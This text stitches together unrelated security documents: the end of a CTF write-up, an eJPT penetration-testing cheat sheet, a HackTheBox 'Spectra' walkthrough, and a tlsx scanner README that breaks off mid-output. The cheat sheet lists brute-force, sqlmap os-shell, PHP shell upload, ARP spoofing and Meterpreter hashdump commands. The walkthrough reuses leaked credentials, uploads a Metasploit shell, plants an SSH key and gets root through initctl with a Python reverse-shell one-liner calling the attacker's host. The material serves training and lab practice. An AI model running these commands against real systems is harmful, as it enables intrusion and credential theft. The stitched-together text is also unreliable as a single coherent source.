integrity="sha384-ygbV9kiqUc6oa4msXn9868pTtWMgiQaeYH7/t7LECLbyPA2x65Kgf80OJFdroafW" crossorigin="anonymous"></script> <meta charset="utf-8"> <title>Top of the Charts</title> </head> <body> <h1>Top of the Charts</h1> <nav id="nav" class="navbar navbar-expand-lg navbar-light bg-light"> <a class="navbar-brand" href="#">Navbar</a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarNav"> <ul class="navbar-nav"> <li class="nav-item active"> <a class="nav-link" href="/">Home</a> </li> </ul> </div> </nav> </body> <h3>Welcome to the Top of the Charts!</h3> <p>Here at top of the charts, we are the ceiling of the world! Nothing is above us!</p> ``` The Home page has only some text, and we don't have any other information I used **nikto** to get more details ```bash nikto -h http://chals5.umdctf.io:4003 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 104.236.193.108 + Target Hostname: chals5.umdctf.io + Target Port: 4003 + Start Time: 2021-04-17 15:58:03 (GMT0) --------------------------------------------------------------------------- + Server: Werkzeug/1.0.1 Python/3.5.2 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Allowed HTTP Methods: OPTIONS, GET, HEAD ``` We can see that we have the HTTP Method **HEAD** Let's use the http method HEAD and check the output ```bash curl -I 'http://chals5.umdctf.io:4003/' HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 flag: UMDCTF-{h3@d1ng_t0w@rd5_th3_l1ght} Content-Length: 0 Server: Werkzeug/1.0.1 Python/3.5.2 Date: Sun, 18 Apr 2021 23:25:35 GMT ``` ## Flag ``` UMDCTF-{h3@d1ng_t0w@rd5_th3_l1ght} ```
# eJPT ![eJPT Logo](/ejpt_logo.png) ## Notes To use these commands, make sure to: - Replace ‘10.10.10.10’ with the relevant IP address - Replace ‘port’ with the relevant port number - Replace /path/to/x with the relevant path to the relevant file ## Networking | slash notation | net mask | hex | binary representation | number of hosts | |----------------|-----------------|------------|-------------------------------------|-----------------| | /0 | 0.0.0.0 | 0x00000000 | 00000000 00000000 00000000 00000000 | 4294967296 | | /1 | 128.0.0.0 | 0x80000000 | 10000000 00000000 00000000 00000000 | 2147483648 | | /2 | 192.0.0.0 | 0xc0000000 | 11000000 00000000 00000000 00000000 | 1073741824 | | /3 | 224.0.0.0 | 0xe0000000 | 11100000 00000000 00000000 00000000 | 536870912 | | /4 | 240.0.0.0 | 0xf0000000 | 11110000 00000000 00000000 00000000 | 268435456 | | /5 | 248.0.0.0 | 0xf8000000 | 11111000 00000000 00000000 00000000 | 134217728 | | /6 | 252.0.0.0 | 0xfc000000 | 11111100 00000000 00000000 00000000 | 67108864 | | /7 | 254.0.0.0 | 0xfe000000 | 11111110 00000000 00000000 00000000 | 33554432 | | /8 | 255.0.0.0 | 0xff000000 | 11111111 00000000 00000000 00000000 | 16777216 | | /9 | 255.128.0.0 | 0xff800000 | 11111111 10000000 00000000 00000000 | 8388608 | | /10 | 255.192.0.0 | 0xffc00000 | 11111111 11000000 00000000 00000000 | 4194304 | | /11 | 255.224.0.0 | 0xffe00000 | 11111111 11100000 00000000 00000000 | 2097152 | | /12 | 255.240.0.0 | 0xfff00000 | 11111111 11110000 00000000 00000000 | 1048576 | | /13 | 255.248.0.0 | 0xfff80000 | 11111111 11111000 00000000 00000000 | 524288 | | /14 | 255.252.0.0 | 0xfffc0000 | 11111111 11111100 00000000 00000000 | 262144 | | /15 | 255.254.0.0 | 0xfffe0000 | 11111111 11111110 00000000 00000000 | 131072 | | /16 | 255.255.0.0 | 0xffff0000 | 11111111 11111111 00000000 00000000 | 65536 | | /17 | 255.255.128.0 | 0xffff8000 | 11111111 11111111 10000000 00000000 | 32768 | | /18 | 255.255.192.0 | 0xffffc000 | 11111111 11111111 11000000 00000000 | 16384 | | /19 | 255.255.224.0 | 0xffffe000 | 11111111 11111111 11100000 00000000 | 8192 | | /20 | 255.255.240.0 | 0xfffff000 | 11111111 11111111 11110000 00000000 | 4096 | | /21 | 255.255.248.0 | 0xfffff800 | 11111111 11111111 11111000 00000000 | 2048 | | /22 | 255.255.252.0 | 0xfffffc00 | 11111111 11111111 11111100 00000000 | 1024 | | /23 | 255.255.254.0 | 0xfffffe00 | 11111111 11111111 11111110 00000000 | 512 | | /24 | 255.255.255.0 | 0xffffff00 | 11111111 11111111 11111111 00000000 | 256 | | /25 | 255.255.255.128 | 0xffffff80 | 11111111 11111111 11111111 10000000 | 128 | | /26 | 255.255.255.192 | 0xffffffc0 | 11111111 11111111 11111111 11000000 | 64 | | /27 | 255.255.255.224 | 0xffffffe0 | 11111111 11111111 11111111 11100000 | 32 | | /28 | 255.255.255.240 | 0xfffffff0 | 11111111 11111111 11111111 11110000 | 16 | | /29 | 255.255.255.248 | 0xfffffff8 | 11111111 11111111 11111111 11111000 | 8 | | /30 | 255.255.255.252 | 0xfffffffc | 11111111 11111111 11111111 11111100 | 4 | | /31 | 255.255.255.254 | 0xfffffffe | 11111111 11111111 11111111 11111110 | 2 | | /32 | 255.255.255.255 | 0xffffffff | 11111111 11111111 11111111 11111111 | 1 | ## Common ports | Port | Protocol | Hint | |------|----------|------------------------| | 22 | SSH | | | 25 | SMTP | | | 110 | POP3 | | | 115 | SFTP | | | 143 | IMAP | | | 80 | HTTP | | | 443 | HTTPS | | | 23 | TELNET | | | 21 | FTP | | | 3389 | RDP | | | 3306 | MYSQL | | | 1433 | MS SQL | | | 137 | NETBIOS | find work groups | | 138 | NETBIOS | list shares & machines | | 139 | NETBIOS | transit data | | 53 | DNS | | ## Routing/Pivoting One thing I am almost sure you will have to do is set up IP routing and routing tables. There are plenty of resources available online for this, but the course content itself seemed to be pretty lacking here. ip route - prints the routing table for the host you are on ip route add ROUTETO via ROUTEFROM - add a route to a new network if on a switched network and you need to pivot ## Enumeration Anyone experienced in penetration testing will tell you that enumeration is 90% of the battle, and I don’t disagree. Although the eJPT doesn’t require a very in depth enumeration cycle, it does cover a broad number of techniques. ### Enumeration (Whois) whois whois site.com ### Enumeration (Ping Sweep) fping -a -g 10.10.10.0/24 2>/dev/null nmap -sn 10.10.10.0/24 ### Nmap Scans #### OS Detection nmap -Pn -O 10.10.10.10 #### Nmap Scan (Quick) nmap -sC -sV 10.10.10.10 #### Nmap Scan (Full) nmap -sC -sV -p- 10.10.10.10 #### Nmap Scan (UDP Quick) nmap -sU -sV 10.10.10.10 #### Nmap output file (-oN) nmap -sn 10.10.10.0/24 -oN hosts.nmap #### To filter out just IPs from the nmap scan results cat hosts.nmap | grep for | cut -d " " -f 5 #### Other nmap scan useful during exam nmap -sV -Pn -T4 -A -p- -iL hosts.nmap -oN ports.nmap nmap --script vuln --script-args=unsafe=1 -iL hosts.nmap ## Web Applications The following commands could be useful when enumerating and attacking web applications. Again, make sure you understand what each one does rather than blindly throwing them at the machine in question. ### Banner Grabbing nc -v 10.10.10.10 port HEAD / HTTP/1.0 ### OpenSSL for HTTPS services openssl s_client -connect 10.10.10.10:443 HEAD / HTTP/1.0 ### Httprint httprint -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt ### HTTP Verbs GET, POST, HEAD, PUT, DELETE, OPTIONS Use the OPTIONS verb to see what other verbs are available nc 10.10.10.10 80 OPTIONS / HTPP/1.0 You can use HTTP verbs to upload a php shell. Find the content length, then use PUT to upload the shell. Make sure you include the size of the payload when using the PUT command. wc -m shell.php x shell.php PUT /shell.php Content-type: text/html Content-length: x Directory and File Scanning My preferred tool at the moment is dirsearch, I find it to to be fast and easy to use. For a more in depth scan, use gobuster and include a large wordlist. dirsearch.py -u http://10.10.10.10 -e * gobuster -u 10.10.10.10 -w /path/to/wordlist.txt Advanced Google Searches Not really necessary, but useful to know all the same. site: intitle: inurl: filetype: AND, OR, &, |, - ### Cross Site Scripting (XSS) The general steps I use to find and test XSS are as follows: 1. Find a reflection point 2. Test with <i> tag 3. Test with HTML/JavaScript code (alert('XSS')) - Reflected XSS = Payload is carried inside the request the victim sends to the website. Typically the link contains the malicious payload - Persistent XSS = Payload remains in the site that multiple users can fall victim to. Typically embedded via a form or forum post ### SQLMap sqlmap -u http://10.10.10.10 -p parameter sqlmap -u http://10.10.10.10 --data POSTstring -p parameter sqlmap -u http://10.10.10.10 --os-shell sqlmap -u http://10.10.10.10 --dump ## System Attacks The other type of ‘attack’ you will be doing are system attacks. Make sure you understand why/how to brute force types of services and hashes, as well as basic metasploit usage. ### Password Attacks #### Unshadow This prepares a file for use with John the Ripper unshadow passwd shadow > unshadow #### Hash Cracking john -wordlist /path/to/wordlist -users=users.txt hashfile ### Network Attacks Brute Forcing with Hydra replace ‘ssh’ with any relevant service hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22 hydra -L users.txt -P pass.txt telnet://10.10.10.10 ### Windows Shares Using Null sessions nmblookup -A 10.10.10.10 smbclient -L //10.10.10.10 -N (list shares) smbclient //10.10.10.10/share -N (mount share) enum4linux -a 10.10.10.10 #### ARP spoofing echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11 ### Metasploit Metasploit is a very useful tool for penetration testers, and I’d recommend going through a Metasploitable for an effective, hands on way to learn about Metasploit. There are plenty of guides and walkthroughs available to learn from. Doing even part of a Metasploitable box will more than prepare you for the Metasploit usage required here. #### Basic Metasploit Commands search x use x info show options, show advanced options SET X (e.g. set RHOST 10.10.10.10, set payload x) #### Meterpreter The below are some handy commands for use with a Meterpreter session. Again, I’d recommend going through a Metasploitable or doing some extra study here. background sessions -l sessions -i 1 sysinfo, ifconfig, route, getuid getsystem (privesc) bypassuac download x /root/ upload x C:\\Windows shell use post/windows/gather/hashdump ## Possible Exam Questions: Below are some examples of the exam questions that you might have during the test: - What’s the password for specific user? - What’s in the file “test.txt”? - How many routers there are in the internal network? - Which IP address belongs to Windows machine? - There is one machine contains the following file C:\\Windows\secret.txt. What is its content? - What are the hard drives in the Windows machine? - What is the IBAN number for the XXXX user? - What is your IP address?
# Spectra URL: https://app.hackthebox.com/machines/Spectra Level: Easy Date: 1 Jun 2021 ## Walkthrough - [Enumeration](#enumeration) - [User flag](#user-flag) - [Privesc](#privesc) # Enumeration ## NMAP ``` # Nmap 7.91 scan initiated Mon May 31 22:34:56 2021 as: nmap -T4 -p- -oN 01_nmap.txt 10.10.10.229 Nmap scan report for 10.10.10.229 Host is up (0.049s latency). Not shown: 65532 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql # Nmap done at Mon May 31 22:35:17 2021 -- 1 IP address (1 host up) scanned in 21.46 seconds ``` ``` # Nmap 7.91 scan initiated Mon May 31 22:36:42 2021 as: nmap -T4 -A -p- -oN 02_nmap.txt 10.10.10.229 Nmap scan report for 10.10.10.229 Host is up (0.044s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.1 (protocol 2.0) | ssh-hostkey: |_ 4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA) 80/tcp open http nginx 1.17.4 |_http-server-header: nginx/1.17.4 |_http-title: Site doesn't have a title (text/html). 3306/tcp open mysql MySQL (unauthorized) |_ssl-cert: ERROR: Script execution failed (use -d to debug) |_ssl-date: ERROR: Script execution failed (use -d to debug) |_sslv2: ERROR: Script execution failed (use -d to debug) |_tls-alpn: ERROR: Script execution failed (use -d to debug) |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=5/31%OT=22%CT=1%CU=43745%PV=Y%DS=2%DC=T%G=Y%TM=60B5492 OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)SEQ(SP=1 OS:05%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2= OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSN OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops TRACEROUTE (using port 554/tcp) HOP RTT ADDRESS 1 44.85 ms 10.10.14.1 2 45.12 ms 10.10.10.229 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon May 31 22:38:00 2021 -- 1 IP address (1 host up) scanned in 78.55 seconds ``` While browsing website, we get a redirect to spectre.htb/index.php, so we add it to our `hosts` file. ``` /main (Status: 301) /testing (Status: 301) ``` Now we get a Wordpress website. Directory listing allows us to reach /testing: ``` wp-admin/ 10-Jun-2020 23:00 - wp-content/ 10-Jun-2020 23:13 - wp-includes/ 10-Jun-2020 23:13 - index.php 06-Feb-2020 06:33 405 license.txt 10-Jun-2020 23:12 19915 readme.html 10-Jun-2020 23:12 7278 wp-activate.php 06-Feb-2020 06:33 6912 wp-blog-header.php 06-Feb-2020 06:33 351 wp-comments-post.php 02-Jun-2020 20:26 2332 wp-config.php 28-Oct-2020 05:52 2997 wp-config.php.save 29-Jun-2020 22:08 2888 wp-cron.php 06-Feb-2020 06:33 3940 wp-links-opml.php 06-Feb-2020 06:33 2496 wp-load.php 06-Feb-2020 06:33 3300 wp-login.php 10-Feb-2020 03:50 47874 wp-mail.php 14-Apr-2020 11:34 8509 wp-settings.php 10-Apr-2020 03:59 19396 wp-signup.php 06-Feb-2020 06:33 31111 wp-trackback.php 06-Feb-2020 06:33 4755 xmlrpc.php ``` We can grab `wp-config.php.save`, and get some credentials to MySQL DB: ``` define( 'DB_NAME', 'dev' ); /** MySQL database username */ define( 'DB_USER', 'devtest' ); /** MySQL database password */ define( 'DB_PASSWORD', 'devteam01' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); ``` We try remote MySQL access, without success: ``` root@kali:/opt/htb/Spectra# mysql -udevtest -p -h 10.10.10.229 Enter password: ERROR 1130 (HY000): Host '10.10.14.28' is not allowed to connect to this MySQL server ``` On "main" website we found a post by "administrator". We get luck with `administrator:devteam01`. Since we are now authenticated, we can get a shell: ``` msf6 > search wp_admin Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_admin_shell_upload msf6 > use exploit/unix/webapp/wp_admin_shell_upload [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options Module options (exploit/unix/webapp/wp_admin_shell_upload): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes The WordPress password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the wordpress application USERNAME yes The WordPress username to authenticate with VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.88.10 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 WordPress msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME administrator USERNAME => administrator msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD devteam01 PASSWORD => devteam01 msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /main TARGETURI => /main msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST spectra.htb VHOST => spectra.htb msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.10.10.229 RHOSTS => 10.10.10.229 msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit [*] Started reverse TCP handler on 192.168.88.10:4444 [*] Authenticating with WordPress using administrator:devteam01... [+] Authenticated with WordPress [*] Preparing payload... [*] Uploading payload... [*] Executing the payload at /main/wp-content/plugins/mjeHkAkuJM/zsorEjQjji.php... [!] This exploit may require manual cleanup of 'zsorEjQjji.php' on the target [!] This exploit may require manual cleanup of 'mjeHkAkuJM.php' on the target [!] This exploit may require manual cleanup of '../mjeHkAkuJM' on the target [*] Exploit completed, but no session was created. msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST tun0 LHOST => tun0 msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit [*] Started reverse TCP handler on 10.10.14.28:4444 [*] Authenticating with WordPress using administrator:devteam01... [+] Authenticated with WordPress [*] Preparing payload... [*] Uploading payload... [*] Executing the payload at /main/wp-content/plugins/QvIHOAvHFU/ZoSlmtEJAQ.php... [*] Sending stage (39282 bytes) to 10.10.10.229 [*] Meterpreter session 1 opened (10.10.14.28:4444 -> 10.10.10.229:42528) at 2021-05-31 23:49:04 +0200 [+] Deleted ZoSlmtEJAQ.php [+] Deleted QvIHOAvHFU.php [+] Deleted ../QvIHOAvHFU meterpreter > ``` We can also add our public ssh key to get a better shell: ``` nginx@spectra ~/.ssh $ wget http://10.10.14.28:8000/id_rsa.pub -O authorized_keys < http://10.10.14.28:8000/id_rsa.pub -O authorized_keys --2021-05-31 14:56:19-- http://10.10.14.28:8000/id_rsa.pub Connecting to 10.10.14.28:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 563 [application/octet-stream] Saving to: 'authorized_keys' authorized_keys 100%[===================>] 563 --.-KB/s in 0s 2021-05-31 14:56:19 (78.5 MB/s) - 'authorized_keys' saved [563/563] nginx@spectra ~/.ssh $ ls -l ls -l total 4 -rw-r--r-- 1 nginx nginx 563 Apr 18 2020 authorized_keys root@kali:~/.ssh# ssh [email protected] nginx@spectra ~ $ nginx@spectra ~ $ ``` We transfer LinPeas and we run it. We found some other credential: ``` [+] Autologin Files /etc/autologin total 4 -rw-r--r-- 1 root root 19 Feb 3 16:43 passwd /etc/autologin/passwd -rw-r--r-- 1 root root 19 Feb 3 16:43 /etc/autologin/passwd SummerHereWeCome!! ``` Now we can access through other user, `katie`. ``` root@kali:/opt/htb/Spectra# ssh [email protected] Password: katie@spectra ~ $ ``` # User-flag Now we can grab user flag from katie home. # Privesc ``` katie@spectra ~ $ sudo -l User katie may run the following commands on spectra: (ALL) SETENV: NOPASSWD: /sbin/initctl ``` We focus on `initctl`: ``` katie@spectra ~ $ sudo /sbin/initctl list | grep test test stop/waiting test1 stop/waiting test7 stop/waiting test6 stop/waiting test5 stop/waiting test4 stop/waiting test10 stop/waiting attestationd start/running, process 1791 trace_marker-test stop/waiting test9 stop/waiting test8 stop/waiting test3 stop/waiting test2 stop/waiting ``` They are all the same: ``` katie@spectra /etc/init $ md5sum test*.conf 9a90f209aeb456ea0e961bfde1f7a3b7 test.conf 9a90f209aeb456ea0e961bfde1f7a3b7 test1.conf 9a90f209aeb456ea0e961bfde1f7a3b7 test10.conf 9a90f209aeb456ea0e961bfde1f7a3b7 test2.conf 9a90f209aeb456ea0e961bfde1f7a3b7 test3.conf 9a90f209aeb456ea0e961bfde1f7a3b7 test4.conf 9a90f209aeb456ea0e961bfde1f7a3b7 test5.conf 9a90f209aeb456ea0e961bfde1f7a3b7 test6.conf 9a90f209aeb456ea0e961bfde1f7a3b7 test7.conf 9a90f209aeb456ea0e961bfde1f7a3b7 test8.conf 9a90f209aeb456ea0e961bfde1f7a3b7 test9.conf ``` ``` katie@spectra /etc/init $ cat test.conf description "Test node.js server" author "katie" start on filesystem or runlevel [2345] stop on shutdown script export HOME="/srv" echo $$ > /var/run/nodetest.pid exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js end script pre-start script echo "[`date`] Node Test Starting" >> /var/log/nodetest.log end script pre-stop script rm /var/run/nodetest.pid echo "[`date`] Node Test Stopping" >> /var/log/nodetest.log end script ``` Through `pspy` we found some cronjobs: ``` 2021/06/01 00:19:15 CMD: UID=0 PID=5079 | /usr/bin/coreutils --coreutils-prog-shebang=cp /bin/cp -p /root/test.conf /etc/init/test1.conf 2021/06/01 00:19:15 CMD: UID=0 PID=5080 | /usr/bin/coreutils --coreutils-prog-shebang=cp /bin/cp -p /root/test.conf /etc/init/test2.conf 2021/06/01 00:19:15 CMD: UID=??? PID=5081 | ??? 2021/06/01 00:19:15 CMD: UID=0 PID=5082 | /usr/bin/coreutils --coreutils-prog-shebang=cp /bin/cp -p /root/test.conf /etc/init/test4.conf 2021/06/01 00:19:15 CMD: UID=0 PID=5083 | 2021/06/01 00:19:15 CMD: UID=0 PID=5085 | /usr/bin/coreutils --coreutils-prog-shebang=cp /bin/cp -p /root/test.conf /etc/init/test7.conf 2021/06/01 00:19:15 CMD: UID=??? PID=5086 | ??? 2021/06/01 00:19:15 CMD: UID=0 PID=5087 | /usr/bin/coreutils --coreutils-prog-shebang=cp /bin/cp -p /root/test.conf /etc/init/test9.conf ``` We replace script with this code: ``` exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ``` We reload configuration: ``` katie@spectra /etc/init $ sudo /sbin/initctl reload-configuration ``` We listen on our 5555/TCP port: ``` root@kali:~# nc -nlvp 5555 listening on [any] 5555 ... ``` ``` katie@spectra /etc/init $ sudo /sbin/initctl start test10 test10 start/running, process 5397 ``` And we get shell: ``` connect to [10.10.14.28] from (UNKNOWN) [10.10.10.229] 38648 spectra / # id id uid=0(root) gid=0(root) groups=0(root) spectra / # ca spectra / # spectra / # ls ls bin dev home lib64 media opt proc run srv tmp var boot etc lib lost+found mnt postinst root sbin sys usr spectra / # cd root cd root spectra /root # ls ls main nodetest.js root.txt script.sh startup test.conf spectra /root # cat root.txt cat root.txt d44519713b889d5e1f9e536d0c6df2fc spectra /root # ```
<h1 align="center"> <img src="https://user-images.githubusercontent.com/8293321/174841003-01a62bad-2ecf-4874-89c4-efa53dd56884.png" width="200px"> <br> </h1> <p align="center"> <a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/license-MIT-_red.svg"></a> <a href="https://goreportcard.com/badge/github.com/projectdiscovery/tlsx"><img src="https://goreportcard.com/badge/github.com/projectdiscovery/tlsx"></a> <a href="https://pkg.go.dev/github.com/projectdiscovery/tlsx/pkg/tlsx"><img src="https://img.shields.io/badge/go-reference-blue"></a> <a href="https://github.com/projectdiscovery/tlsx/releases"><img src="https://img.shields.io/github/release/projectdiscovery/tlsx"></a> <a href="https://twitter.com/pdiscoveryio"><img src="https://img.shields.io/twitter/follow/pdiscoveryio.svg?logo=twitter"></a> <a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a> </p> <p align="center"> <a href="#features">Features</a> • <a href="#installation">Installation</a> • <a href="#usage">Usage</a> • <a href="#running-tlsx">Running tlsx</a> • <a href="https://discord.gg/projectdiscovery">Join Discord</a> </p> A fast and configurable TLS grabber focused on TLS based **data collection and analysis**. # Features ![image](https://user-images.githubusercontent.com/8293321/174847743-0e229545-2431-4b4c-9029-878f218ad0bc.png) - Fast And fully configurable TLS Connection - Multiple **Modes for TLS Connection** - Multiple **TLS probes** - **Auto TLS Fallback** for older TLS version - **Pre Handshake** TLS connection (early termination) - Customizable **Cipher / SNI / TLS** selection - **JARM/JA3** TLS Fingerprint - **TLS Misconfigurations** - **ASN,CIDR,IP,HOST,** and **URL** input - STD **IN/OUT** and **TXT/JSON** output ## Installation tlsx requires **Go 1.19** to install successfully. To install, just run the below command or download pre-compiled binary from [release page](https://github.com/projectdiscovery/tlsx/releases). ```console go install github.com/projectdiscovery/tlsx/cmd/tlsx@latest ``` ## Usage ```console tlsx -h ``` This will display help for the tool. Here are all the switches it supports. ```console TLSX is a tls data gathering and analysis toolkit. Usage: tlsx [flags] Flags: INPUT: -u, -host string[] target host to scan (-u INPUT1,INPUT2) -l, -list string target list to scan (-l INPUT_FILE) -p, -port string[] target port to connect (default 443) SCAN-MODE: -sm, -scan-mode string tls connection mode to use (ctls, ztls, openssl, auto) (default "auto") -ps, -pre-handshake enable pre-handshake tls connection (early termination) using ztls -sa, -scan-all-ips scan all ips for a host (default false) -iv, -ip-version string[] ip version to use (4, 6) (default 4) PROBES: -san display subject alternative names -cn display subject common names -so display subject organization name -tv, -tls-version display used tls version -cipher display used cipher -hash string display certificate fingerprint hashes (md5,sha1,sha256) -jarm display jarm fingerprint hash -ja3 display ja3 fingerprint hash (using ztls) -wc, -wildcard-cert display host with wildcard ssl certificate -tps, -probe-status display tls probe status -ve, -version-enum enumerate and display supported tls versions -ce, -cipher-enum enumerate and display supported cipher -ct, -cipher-type value ciphers types to enumerate. possible values: all/secure/insecure/weak (comma-separated) (default all) -ch, -client-hello include client hello in json output (ztls mode only) -sh, -server-hello include server hello in json output (ztls mode only) -se, -serial display certificate serial number MISCONFIGURATIONS: -ex, -expired display host with host expired certificate -ss, -self-signed display host with self-signed certificate -mm, -mismatched display host with mismatched certificate -re, -revoked display host with revoked certificate -un, -untrusted display host with untrusted certificate CONFIGURATIONS: -config string path to the tlsx configuration file -r, -resolvers string[] list of resolvers to use -cc, -cacert string client certificate authority file -ci, -cipher-input string[] ciphers to use with tls connection -sni string[] tls sni hostname to use -rs, -random-sni use random sni when empty -rps, -rev-ptr-sni perform reverse PTR to retrieve SNI from IP -min-version string minimum tls version to accept (ssl30,tls10,tls11,tls12,tls13) -max-version string maximum tls version to accept (ssl30,tls10,tls11,tls12,tls13) -cert, -certificate include certificates in json output (PEM format) -tc, -tls-chain include certificates chain in json output -vc, -verify-cert enable verification of server certificate -ob, -openssl-binary string OpenSSL Binary Path -hf, -hardfail strategy to use if encountered errors while checking revocation status OPTIMIZATIONS: -c, -concurrency int number of concurrent threads to process (default 300) -timeout int tls connection timeout in seconds (default 5) -retry int number of retries to perform for failures (default 3) -delay string duration to wait between each connection per thread (eg: 200ms, 1s) UPDATE: -up, -update update tlsx to latest version -duc, -disable-update-check disable automatic tlsx update check OUTPUT: -o, -output string file to write output to -j, -json display output in jsonline format -ro, -resp-only display tls response only -silent display silent output -nc, -no-color disable colors in cli output -v, -verbose display verbose output -version display project version DEBUG: -health-check, -hc run diagnostic check up ``` ## Using tlsx as library Examples of using tlsx as library are provided in the [examples](examples/) folder. ## Running tlsx ### Input for tlsx **tlsx** requires **ip** to make TLS connection and accept multiple format as listed below: ```bash AS1449 # ASN input 173.0.84.0/24 # CIDR input 93.184.216.34 # IP input example.com # DNS input example.com:443 # DNS input with port https://example.com:443 # URL input port ``` Input host can be provided using `-host / -u` flag, and multiple values can be provided using comma-separated input, similarly **file** input is supported using `-list / -l` flag. Example of comma-separated host input: ```console $ tlsx -u 93.184.216.34,example.com,example.com:443,https://example.com:443 -silent ``` Example of file based host input: ```console $ tlsx -list host_list.txt ``` **Port Input:** **tlsx** connects on port **443** by default, which can be customized using `-port / -p` flag, single or multiple ports can be specified using comma sperated input or new line delimited file containing list of ports to connect. Example of comma-separated port input: ``` $ tlsx -u hackerone.com -p 443,8443 ``` Example of file based port input: ``` $ tlsx -u hackerone.com -p port_list.txt ``` **Note:** > When input host contains port in it, for example, `8.8.8.8:443` or `hackerone.com:8443`, port specified with host will be used to make TLS connection instead of default or one provided using `-port / -p` flag. ### TLS Probe (default run) This will run the tool against the given CIDR range and returns hosts that accepts tls connection on port 443. ```console $ echo 173.0.84.0/24 | tlsx _____ _ _____ __ |_ _| | / __\ \/ / | | | |__\__ \> < |_| |____|___/_/\_\ v0.0.1 projectdiscovery.io [WRN] Use with caution. You are responsible for your actions. [WRN] Developers assume no liability and are not responsible for any misuse or damage. 173.0.84.69:443 173.0.84.67:443 173.0.84.68:443 173.0.84.66:443 173.0.84.76:443 173.0.84.70:443 173.0.84.72:443 ``` ### SAN/CN Probe TLS certificate contains DNS names under **subject alternative name** and **common name** field that can be extracted using `-san`, `-cn` flag. ```console $ echo 173.0.84.0/24 | tlsx -san -cn -silent 173.0.84.104:443 [uptycspay.paypal.com] 173.0.84.104:443 [api-3t.paypal.com] 173.0.84.104:443 [api-m.paypal.com] 173.0.84.104:443 [payflowpro.paypal.com] 173.0.84.104:443 [pointofsale-s.paypal.com] 173.0.84.104:443 [svcs.paypal.com] 173.0.84.104:443 [uptycsven.paypal.com] 173.0.84.104:443 [api-aa.paypal.com] 173.0.84.104:443 [pilot-payflowpro.paypal.com] 173.0.84.104:443 [pointofsale.paypal.com] 173.0.84.104:443 [uptycshon.paypal.com] 173.0.84.104:443 [api.paypal.com] 173.0.84.104:443 [adjvendor.paypal.com] 